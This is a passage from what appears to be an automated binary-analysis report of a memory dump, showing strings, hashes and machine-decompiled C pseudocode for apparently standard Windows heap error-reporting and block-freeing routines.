                                                                                                                                                    • *** then kb to get the faulting stack, xrefs: 0317B51C
                                                                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0317B39B
                                                                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0317B476
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                    • API String ID: 0-108210295
                                                                                                                                                    • Opcode ID: 1c60901d50678d68dd4198801f80d5311c4ea3afa8179bf9e360efc565af36c3
                                                                                                                                                    • Instruction ID: ee50bfe6d3a8792c4ad4b61cf23fb2aea9ab86440b7fdd9b7fbc6652fab20fde
                                                                                                                                                    • Opcode Fuzzy Hash: 1c60901d50678d68dd4198801f80d5311c4ea3afa8179bf9e360efc565af36c3
                                                                                                                                                    • Instruction Fuzzy Hash: A881E239A49200FFCB25EF05DC45DAF7F36AF4EA91F898054F5162F112D3A19491CAB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03181C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                    			E03181C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x30a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E030CB150();
				} else {
					E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x31b589c);
				E030CB150("Heap error detected at %p (heap handle %p)\n",  *0x31b58a0);
				_t27 =  *0x31b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03181E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E030CB150();
				} else {
					E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E030CB150("Error code: %d - %s\n",  *0x31b5898);
				_t113 =  *0x31b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E030CB150("Parameter1: %p\n",  *0x31b58a4);
				}
				_t115 =  *0x31b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E030CB150("Parameter2: %p\n",  *0x31b58a8);
				}
				_t117 =  *0x31b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E030CB150("Parameter3: %p\n",  *0x31b58ac);
				}
				_t119 =  *0x31b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x31b58b4);
					E030CB150("Last known valid blocks: before - %p, after - %p\n",  *0x31b58b0);
				} else {
					_t120 =  *0x31b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E030CB150();
				} else {
					E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E030CB150("Stack trace available at %p\n", 0x31b58c0);
			}











                                                                                                                                                    0x03181c10
                                                                                                                                                    0x03181c16
                                                                                                                                                    0x03181c1e
                                                                                                                                                    0x03181c3d
                                                                                                                                                    0x03181c3e
                                                                                                                                                    0x03181c20
                                                                                                                                                    0x03181c35
                                                                                                                                                    0x03181c3a
                                                                                                                                                    0x03181c44
                                                                                                                                                    0x03181c55
                                                                                                                                                    0x03181c5a
                                                                                                                                                    0x03181c65
                                                                                                                                                    0x03181c67
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03181c6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03181c67
                                                                                                                                                    0x03181cdc
                                                                                                                                                    0x03181ce5
                                                                                                                                                    0x03181d04
                                                                                                                                                    0x03181d05
                                                                                                                                                    0x03181ce7
                                                                                                                                                    0x03181cfc
                                                                                                                                                    0x03181d01
                                                                                                                                                    0x03181d0b
                                                                                                                                                    0x03181d17
                                                                                                                                                    0x03181d1f
                                                                                                                                                    0x03181d25
                                                                                                                                                    0x03181d30
                                                                                                                                                    0x03181d4f
                                                                                                                                                    0x03181d50
                                                                                                                                                    0x03181d32
                                                                                                                                                    0x03181d47
                                                                                                                                                    0x03181d4c
                                                                                                                                                    0x03181d61
                                                                                                                                                    0x03181d67
                                                                                                                                                    0x03181d68
                                                                                                                                                    0x03181d6e
                                                                                                                                                    0x03181d79
                                                                                                                                                    0x03181d98
                                                                                                                                                    0x03181d99
                                                                                                                                                    0x03181d7b
                                                                                                                                                    0x03181d90
                                                                                                                                                    0x03181d95
                                                                                                                                                    0x03181daa
                                                                                                                                                    0x03181db0
                                                                                                                                                    0x03181db1
                                                                                                                                                    0x03181db7
                                                                                                                                                    0x03181dc2
                                                                                                                                                    0x03181de1
                                                                                                                                                    0x03181de2
                                                                                                                                                    0x03181dc4
                                                                                                                                                    0x03181dd9
                                                                                                                                                    0x03181dde
                                                                                                                                                    0x03181df3
                                                                                                                                                    0x03181df9
                                                                                                                                                    0x03181dfa
                                                                                                                                                    0x03181e00
                                                                                                                                                    0x03181e0a
                                                                                                                                                    0x03181e13
                                                                                                                                                    0x03181e32
                                                                                                                                                    0x03181e33
                                                                                                                                                    0x03181e15
                                                                                                                                                    0x03181e2a
                                                                                                                                                    0x03181e2f
                                                                                                                                                    0x03181e39
                                                                                                                                                    0x03181e4a
                                                                                                                                                    0x03181e02
                                                                                                                                                    0x03181e02
                                                                                                                                                    0x03181e08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03181e08
                                                                                                                                                    0x03181e5b
                                                                                                                                                    0x03181e7a
                                                                                                                                                    0x03181e7b
                                                                                                                                                    0x03181e5d
                                                                                                                                                    0x03181e72
                                                                                                                                                    0x03181e77
                                                                                                                                                    0x03181e95

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                                    • API String ID: 0-2897834094
                                                                                                                                                    • Opcode ID: 8fefff02c55c3e2d42913c5edb623b0eb0aec6d76d1d5926b1ce0e13331aee69
                                                                                                                                                    • Instruction ID: d5d44ce2e85d4af427b7ece4c15eda38b84dd29199a1f1a126e89fe383e9679a
                                                                                                                                                    • Opcode Fuzzy Hash: 8fefff02c55c3e2d42913c5edb623b0eb0aec6d76d1d5926b1ce0e13331aee69
                                                                                                                                                    • Instruction Fuzzy Hash: 61616637522684EFC215F789E486AA873F5EB4C96074A807EF80B5F211D7349882CE1D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E030EA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x31b8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E030EA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E030EDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E030C9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E030CA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x31b8748 - 1;
						if( *0x31b8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E030CB150();
								} else {
									E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E030CB150();
								__eflags =  *0x31b7bc8;
								if( *0x31b7bc8 == 0) {
									__eflags = 1;
									E03182073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x31b8748 - 1;
							if( *0x31b8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E030F174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E030E7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E031814FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E030C9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E030C9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x31b8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E030CB150();
											} else {
												E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E030CB150();
											_pop(_t491);
											__eflags =  *0x31b7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E03182073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0318A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E030EA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E030E7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E030E7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E03181411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E030E7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E030E7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x31b8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E030CB150();
							} else {
								E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E030CB150();
							__eflags =  *0x31b7bc8;
							if( *0x31b7bc8 == 0) {
								__eflags = 0;
								E03182073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x31b8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E030CB150();
												} else {
													E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E030CB150();
												__eflags =  *0x31b7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E03182073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0318A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E030EA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E030EB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E030EA830(_t553, _v64, _v24);
								_t286 = E030E7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E030E7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E03181411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E030E7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E030E7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E03181411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E030F174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E030EB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E030E7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E031814FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
